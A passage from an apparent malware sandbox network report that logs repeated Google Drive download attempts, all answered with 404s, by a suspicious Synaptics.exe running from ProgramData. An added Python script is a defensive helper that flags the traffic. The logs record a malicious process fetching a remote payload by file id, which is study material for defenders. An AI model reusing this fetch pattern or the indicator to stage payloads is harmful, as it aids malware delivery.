2024-12-30 10:24:25 UTC | 1601              | IN        | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 2d 37 65 61 4e 73 6e 6f 39 78 73 76 69 45 6e 36 55 68 78 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="P-7eaNsno9xsviEn6UhxlA">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:24:25 UTC | 51                | IN        | Data Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
    Data Ascii: his server. <ins>That’s all we know.</ins></main>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
8          | 192.168.2.6 | 49816       | 142.250.186.46 | 443              | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-30 10:24:25 UTC | 143               | OUT       | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:24:25 UTC | 1314              | IN        | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:25 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'report-sample' 'nonce-Tir1M6stQ05BdJ2WBxJSEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
9          | 192.168.2.6 | 49817       | 172.217.23.97  | 443              | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-30 10:24:25 UTC | 387               | OUT       | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=BYMo-wv4eYJdWmry7AUwgnY8FD94uo3veWkAXjfZOk1mv7TJVBgEhqFHCgX6R2JeKOBvo50nIjRpzf2b_9A2GW8ksEyt-5g4q85Ob8tsU_aR9mcINLgHh64rG-oKyQGbjBH7KUvXgliKdHc4uXAnoj7xbO6TIXqQNfde8w3K2uPd4t-_pCWMMPI
2024-12-30 10:24:25 UTC | 1250              | IN        | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC5OUs6SLq_gifeKaWfdpW8szT43R6AulKqLDrTgdYvBbpR3pbfDkd0ReVRyEkQDO-S3nK3tmcY
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:25 GMT
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: script-src 'report-sample' 'nonce-Npx_MsSYLtwC38RCVckNlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:24:25 UTC | 140               | IN        | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:24:25 UTC | 1390              | IN        | Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 42 65 32 48 57 79 70 6d 56 71 37 35 71 5f 37 30 37 63 79 68 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
    Data Ascii: 404 (Not Found)!!1</title><style nonce="cBe2HWypmVq75q_707cyhw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:24:25 UTC | 122               | IN        | Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
    Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


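Sessions 6 to 9 are one fetch repeated: Synaptics.exe (PID 5048, running from C:\ProgramData\Synaptics\) asks docs.google.com for a Drive file by id with export=download, follows the 303 to drive.usercontent.google.com, receives a 404, and tries again within the same second, identifying itself with its own file name as User-Agent. The script below is an added example for this report, not Joe Sandbox code and not part of the analysed sample. It parses a constructed, simplified transcript of those four sessions (endpoints, PID, request lines, User-Agent, Host, status codes and the Location header copied from the report; the "SESSION"/OUT/IN line format is an assumption of the example, not the report's layout) and flags the three things a detection engineer would alert on here: a User-Agent equal to the requesting binary's file name, a Google Drive direct-download fetch from a non-browser process, and repeated 404s for the same file id from one process.

```python
"""Triage helper for an HTTP session transcript like the one in this report.
Added example: not Joe Sandbox code and not part of the analysed sample. The
"SESSION"/OUT/IN line format is a constructed simplification of the report's tables."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed transcript: endpoints, PID, request lines, User-Agent, Host, status codes
# and the Location header are copied from sessions 6 to 9 above; other headers are left out.
SAMPLE = r"""
SESSION 6 192.168.2.6:49813 -> 142.250.186.46:443 pid=5048 C:\ProgramData\Synaptics\Synaptics.exe
OUT GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
OUT User-Agent: Synaptics.exe
OUT Host: docs.google.com
IN HTTP/1.1 303 See Other
IN Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
SESSION 7 192.168.2.6:49814 -> 172.217.23.97:443 pid=5048 C:\ProgramData\Synaptics\Synaptics.exe
OUT GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
OUT User-Agent: Synaptics.exe
OUT Host: drive.usercontent.google.com
IN HTTP/1.1 404 Not Found
SESSION 8 192.168.2.6:49816 -> 142.250.186.46:443 pid=5048 C:\ProgramData\Synaptics\Synaptics.exe
OUT GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
OUT User-Agent: Synaptics.exe
OUT Host: docs.google.com
IN HTTP/1.1 303 See Other
SESSION 9 192.168.2.6:49817 -> 172.217.23.97:443 pid=5048 C:\ProgramData\Synaptics\Synaptics.exe
OUT GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
OUT User-Agent: Synaptics.exe
OUT Host: drive.usercontent.google.com
IN HTTP/1.1 404 Not Found
"""

SESSION_RE = re.compile(r"^SESSION (?P<sid>\d+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
                        r"(?P<dst>[\d.]+):(?P<dport>\d+) pid=(?P<pid>\d+) (?P<process>.+)$")
REQUEST_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$")
STATUS_RE = re.compile(r"^HTTP/1\.[01] (?P<status>\d{3})")
# Public Google Drive hosts that serve "direct download" links (the redirect chain seen above).
DRIVE_HOSTS = {"docs.google.com", "drive.google.com", "drive.usercontent.google.com"}


def parse_sessions(text):
    """Split the transcript into one dict per session: endpoints, request line, headers, status."""
    sessions, cur = [], None
    for line in filter(None, map(str.strip, text.splitlines())):
        m = SESSION_RE.match(line)
        if m:
            cur = dict(m.groupdict(), method=None, target=None, status=None, req={}, resp={})
            sessions.append(cur)
            continue
        direction, _, payload = line.partition(" ")
        if cur is None or direction not in ("OUT", "IN"):
            continue
        headers = cur["req"] if direction == "OUT" else cur["resp"]
        rm, sm = REQUEST_RE.match(payload), STATUS_RE.match(payload)
        if direction == "OUT" and rm and cur["method"] is None:
            cur["method"], cur["target"] = rm.group("method"), rm.group("target")
        elif direction == "IN" and sm and cur["status"] is None:
            cur["status"] = int(sm.group("status"))
        elif ":" in payload:                      # header line; names are case-insensitive
            name, _, value = payload.partition(":")
            headers[name.strip().lower()] = value.strip()
    return sessions


def drive_file_id(session):
    """Return the Drive file id when the request is a Drive direct download (export=download), else None."""
    host = session["req"].get("host", "").lower()
    if host not in DRIVE_HOSTS or not session["target"]:
        return None
    parts = urlsplit(session["target"])
    qs = parse_qs(parts.query)
    if parts.path not in ("/uc", "/download") or qs.get("export") != ["download"]:
        return None
    return qs.get("id", [None])[0]


def user_agent_is_process_name(session):
    """True when the User-Agent is just the requesting binary's file name, as Synaptics.exe sends."""
    ua = session["req"].get("user-agent", "").lower()
    return ua == session["process"].replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage(text):
    """Return (sessions, findings): binary-name User-Agents, Drive downloads, repeated 404s per file id."""
    sessions = parse_sessions(text)
    findings, misses = [], Counter()
    for s in sessions:
        if user_agent_is_process_name(s):
            findings.append(f"session {s['sid']}: User-Agent {s['req']['user-agent']!r} is the process's own file name")
        fid = drive_file_id(s)
        if fid:
            findings.append(f"session {s['sid']}: Google Drive direct download id={fid} via {s['req']['host']} -> HTTP {s['status']}")
            if s["status"] == 404:
                misses[(s["process"], fid)] += 1
    for (proc, fid), n in misses.items():
        if n >= 2:  # the same binary keeps asking for a file Drive reports as missing: a retry loop
            findings.append(f"{proc}: {n} failed (404) fetches of Drive id={fid}, retrying")
    return sessions, findings


if __name__ == "__main__":
    for finding in triage(SAMPLE)[1]:
        print(finding)
```

The file id is the durable indicator here: the Drive hostnames and the 404 body are shared with every legitimate Drive user, but a non-browser process fetching one specific id with export=download, and continuing to poll it after Drive answers 404, is what separates this traffic from normal use of the service.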
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
10         | 192.168.2.6 | 49824       | 142.250.186.46 | 443              | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-30 10:24:26 UTC | 143               | OUT       | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:24:26 UTC | 1314              | IN        | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:26 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'report-sample' 'nonce-vzOEp-yaMo556KYtcGo4jQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
11         | 192.168.2.6 | 49826       | 172.217.23.97  | 443              | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-30 10:24:26 UTC | 388               | OUT       | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=Y_PNLw8RAdUj4J1fOerPMq8Ej9LvL1f7eF6_piOgXJNptBE8qxvPOkddsBqHD9gQOeCrJToQuet-_tokPg-JdZJiqyAu88gCyYeyuE48kpaD4y1_QnonBLTPPkt56ERiisqn6OfLmXRqnXEdx-shuyT3q60FEk5q_r3UTpHE8-DK_GE5EajAs4Vr
2024-12-30 10:24:27 UTC | 1250              | IN        | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC5PadOovM7s9q5Wk1FfDLTsnskZrz30GV1YL-mQ5BpWt77CpHEb_GtuOiyxHGGXeWRZM0rBR2Y
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:26 GMT
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-blAmeqrZ0EEv6NGq11xvow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                            Connection: close
                                                                                                                            2024-12-30 10:24:27 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                            2024-12-30 10:24:27 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 47 54 6f 50 52 6a 33 59 30 6f 69 48 39 4e 55 78 43 55 65 6b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="FGToPRj3Y0oiH9NUxCUekA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                            2024-12-30 10:24:27 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49825 | 142.250.186.46 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:26 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:24:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:26 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-IgJtK-WdFMFEYF3eXmwrWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49828 | 172.217.23.97 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:26 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
2024-12-30 10:24:27 UTC | 1243 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC46BymJCRqKBorebc2NonONRqLKZVtdOnh7C0s5guQ8geNTZrtyaCD-QHzcNnidF8YO
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:27 GMT
    Content-Security-Policy: script-src 'report-sample' 'nonce-9v7le9JNVb7QErAUUIhmVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:24:27 UTC | 147 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:24:27 UTC | 1390 | IN | Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 4b 61 36 6d 41 47 49 66 33 36 62 48 58 47 72 36 38 63 38 56 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
    Data Ascii: t Found)!!1</title><style nonce="VKa6mAGIf36bHXGr68c8Vw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
